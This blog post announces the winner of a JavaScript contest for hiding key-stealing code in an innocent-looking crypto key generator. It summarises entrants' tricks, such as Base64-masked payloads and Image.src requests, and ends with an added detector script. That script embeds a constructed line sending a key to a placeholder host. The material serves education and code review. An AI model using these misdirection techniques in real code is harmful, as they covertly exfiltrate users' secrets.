The First JavaScript Misdirection Contest

by Peter Jaric

Finally we have a winner!

But first, some background. One month ago, on the 29th of August, I announced the JavaScript Misdirection Contest:

There is a programming contest called The Underhanded C Contest. In their own words, it is “an annual contest to write innocent-looking C code implementing malicious behavior”. I am very much intrigued by that concept, but as my C-skills have declined considerably, I recently wished that there also was a JavaScript version. Pepe Vila suggested that I should start one myself, and here it is.

In short, the goal of the contest was to write code that generated a key for a made-up crypto coin called VDC, and at the same time include hidden code to send that key to your own server. Read more about it, and all the rules, over at misdirect.ion.land.

The kind people over at Detectify (who make a great web based security scanner) donated the first prize, a cool pentesting device called the USB Rubber Ducky Deluxe.

The contest ended on the 13th of September, and by then I had received 40 submissions, of which 34 were valid. The number of submissions and the nice comments I got from the contestants made the contest a success in my eyes.

The winner

And now to what you’ve all been waiting for, the results. I have decided to award the first prize in the JavaScript Misdirection Contest #0 to…

Aymeric Beaumet!

Congratulations!

I liked his submission because it is short and still manages to include hidden evil code. Most other contest submissions were far longer. You can check out his entry over here: http://jsfiddle.net/c6z0kb4g/0. Aymeric’s own description of his submission is included at the end of this post.

The runner-up is Jesse Eedrah, who used a cool Unicode trick to misdirect the reader. You can find it here: http://jsfiddle.net/afswj8cL/0. Jesse also put an explanation on GitHub: https://github.com/eedrah/Javascript-Misdirection-Entry

The other entries follow at the end of the post (except for a few whose authors wished to be removed from the list). Do you think I made the right choice, or is there a more worthy winner?

Submitted code

Some random thoughts about the submissions:

  • Many contestants hid the evil code in a Base64-encoded block, often masked as a seed or key.
  • Using Image.src as a way to send the key was very common. I also used it in my example, which may be the reason.
  • Another trick used by more than one contestant was to include a link to StackOverflow in a comment. I think that was quite clever, because as a code reviewer (and creator) I am used to finding this kind of comment explaining unusual code.
  • Generally I find it easier to skip over code that has a good comment above it, so I think that is a good trick too.

Next time?

This was the first JavaScript Misdirection Contest. That kind of implies that there will be another one. :) Hopefully I will run it again later on, but probably not until next year. I’ve learned a few things from this round; most of all that it takes a lot of time, which I don’t have. So the next time I will try to do things a little differently, and luckily I have a few ideas.

Thanks

I have not done this all by myself. I’d like to thank Jacob Soo, Jonatan Heyman, Victor Haffreingue, File Descriptor and Detectify.

Other solutions

These are the other valid submissions (except for those who elected to be removed):

_nderscore http://jsfiddle.net/now9fmvv/0
A. Levin https://jsfiddle.net/31vnwus9/0
Agop Shirinian https://jsfiddle.net/fs885ys8/0
Aleksandr Belkin http://jsfiddle.net/8tL4m43j/0
Alex http://jsfiddle.net/z4v88k00/0
Andrew Moffat http://jsfiddle.net/xvdmch0s/0
Aymeric Beaumet http://jsfiddle.net/c6z0kb4g/0
Calle Svensson https://jsfiddle.net/qpfs1vjz/0
Carl Zulauf http://jsfiddle.net/nvL6g8xd/0
Craig Spence http://jsfiddle.net/74k2hd7e/0
David G http://jsfiddle.net/w02rdLcn/0
David Roberts https://jsfiddle.net/4nqnhrpp/0
Donald Abrams http://jsfiddle.net/by6ukh09/0
Duncan Hall http://jsfiddle.net/gp80d9pf/0/
Emil Stenström http://jsfiddle.net/6epxLfny/0
Ephi Gabay http://jsfiddle.net/65p7y1xf/0
Eran Schoellhorn http://jsfiddle.net/absf4uur/0
Evan Hahn https://jsfiddle.net/jjr6nfjd/0
Jeka Kiselyov http://jsfiddle.net/pLntoqj0/0
Jesse Eedrah http://jsfiddle.net/afswj8cL/0
Jonas P. Hyatt http://jsfiddle.net/b0cLhfqu/0
Jonathan Mann http://jsfiddle.net/1b41dehs/0
Kaley Crum http://jsfiddle.net/y8L8ar4a/0
Kamil Vavra https://jsfiddle.net/ashvwfz0/0
Kevin Bedi http://jsfiddle.net/esgrdjag/0
Kristov Atlas http://jsfiddle.net/m9qxh8q1/0
Michael Hayes http://jsfiddle.net/n0hLga7p/0
nick http://jsfiddle.net/omeeshu3/0
Olivier Arteau https://jsfiddle.net/watLyqzj/0
Ondřej Žára http://jsfiddle.net/3qgun1u1/0
Peabnuts123 http://jsfiddle.net/fgw464v5/0
poerhiz http://jsfiddle.net/a39qwbv7/0
@devsbh https://jsfiddle.net/4je730xn/0
Stephen Checkoway http://jsfiddle.net/ptgru5du/0
Timo Kissing http://jsfiddle.net/sk7c3o57/0

Aymeric’s tricks

The tricks behind his solution, in his own words:

– perform a request leveraging Image.src
– generate the seed as being `src`
– use the seed to generate the domain name (src.sr)
– obfuscate the url construction as if it was the hash

Will send the generated key to __generated_key__.src.sr (necessitates the proper DNS CNAME wildcard)
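A review aid for the patterns listed under "Submitted code" above (Base64 blocks masked as seeds, Image.src used to send the key, reassuring links in comments, Unicode misdirection) and for the Image.src plus subdomain approach in Aymeric's description. This is an added example and not code from the contest, this post, or any entry. It assumes Node.js (Buffer for Base64 decoding); every source line it scans, the hidden snippet, the placeholder link and the host name exfil.example are constructed for the demonstration.

```javascript
// Added example, not code from the contest post or from any entry. A small static
// review helper for the misdirection patterns described in the post: Base64 blobs
// that decode to JavaScript, run-time code construction (eval/Function/atob),
// Image.src set from a computed URL, reassuring links in comments, and non-ASCII
// characters in source. Assumes Node.js (Buffer for Base64); all input below is
// constructed sample text, and exfil.example is a placeholder host, not a real one.

// Constructed hidden snippet, the kind of thing stashed in a seed-looking string.
const HIDDEN = "new Image().src='//'+key+'.exfil.example';";
const BLOB = Buffer.from(HIDDEN, "utf8").toString("base64");

// Constructed sample submission: looks like a key generator, but decodes and runs
// the "seed", and line 6 uses a Cyrillic look-alike (U+0435) in an identifier.
const SAMPLE_LINES = [
  "function generateKey(seed) {",
  "  // hex-encode the seed, see https://example.com/why-hex (placeholder link)",
  "  var key = Array.from(seed).map(function (c) { return c.charCodeAt(0).toString(16); }).join('');",
  "  var seed2 = \"" + BLOB + "\";",
  "  new Function('key', atob(seed2))(key);",
  "  var k\u0435y = key;",
  "  return key;",
  "}",
];

// Constructed clean control: same idea without the tricks; should produce no findings.
const CLEAN_LINES = [
  "function generateKey(seed) {",
  "  var key = '';",
  "  for (var i = 0; i < seed.length; i++) { key += seed.charCodeAt(i).toString(16); }",
  "  return key;",
  "}",
];

// Line-level rules. Each is a heuristic for a human to follow up, not a verdict.
const RULES = [
  { id: "DYNAMIC_CODE",
    test: (line) => /\b(eval|Function|atob)\s*\(/.test(line),
    why: "code is built or decoded at run time; read what it actually executes" },
  { id: "DYNAMIC_SRC",
    // .src = "literal"; is allowed, anything computed (concatenation, variables) is flagged
    test: (line) => /\.src\s*=\s*(?!["'`][^"'`+]*["'`]\s*;?\s*$)/.test(line),
    why: "src set from a computed value; the resulting GET can carry data in the URL or host name" },
  { id: "COMMENT_URL",
    test: (line) => /(\/\/|\/\*).*https?:\/\//.test(line),
    why: "link in a comment; check that the reference really explains this code" },
  { id: "NON_ASCII",
    test: (line) => /[^\x09\x20-\x7e]/.test(line),
    why: "non-ASCII character in source; could be a look-alike identifier or an invisible control character" },
];

// String literals that look like Base64 and are long enough to hold code.
const B64_LITERAL = /["'`]([A-Za-z0-9+/]{24,}={0,2})["'`]/g;
const JS_SHAPED = /[;(){}]|=>|\.src|new |atob|eval|Function|https?:|\/\//;

// Returns the decoded text if the blob is mostly printable and looks like JavaScript,
// otherwise null (a genuine random key decodes to binary and is left alone).
function decodesToCode(blob) {
  const bytes = Buffer.from(blob, "base64");
  let printable = 0;
  for (const b of bytes) if ((b >= 0x20 && b <= 0x7e) || b === 0x0a || b === 0x09) printable++;
  if (bytes.length === 0 || printable / bytes.length < 0.95) return null;
  const text = bytes.toString("utf8");
  return JS_SHAPED.test(text) ? text : null;
}

// Runs every rule over every line, and over the decoded form of any code-shaped
// Base64 literal, since that is where the interesting part usually lives.
function reviewSource(lines) {
  const findings = [];
  lines.forEach((line, i) => {
    const n = i + 1;
    for (const rule of RULES) {
      if (rule.test(line)) findings.push({ line: n, rule: rule.id, detail: rule.why });
    }
    for (const m of line.matchAll(B64_LITERAL)) {
      const code = decodesToCode(m[1]);
      if (code === null) continue;
      findings.push({ line: n, rule: "BASE64_CODE", detail: "literal decodes to: " + code });
      for (const rule of RULES) {
        if (rule.test(code)) findings.push({ line: n, rule: rule.id + "(decoded)", detail: rule.why });
      }
    }
  });
  return findings;
}

for (const f of reviewSource(SAMPLE_LINES)) console.log("line " + f.line + ": " + f.rule + ": " + f.detail);
```

On the constructed sample this reports five findings (the comment link, the Base64 literal and the computed src inside it, the `new Function`/`atob` call, and the look-alike identifier) and nothing on the clean control. The printable-ratio threshold is what keeps a real random key, which also Base64-encodes to a long blob, from being flagged. The rules are line-based regexes, so they are a starting point for a reviewer, not a substitute for reading what a flagged line does; the contest entries themselves show how much can be hidden behind one reassuring comment.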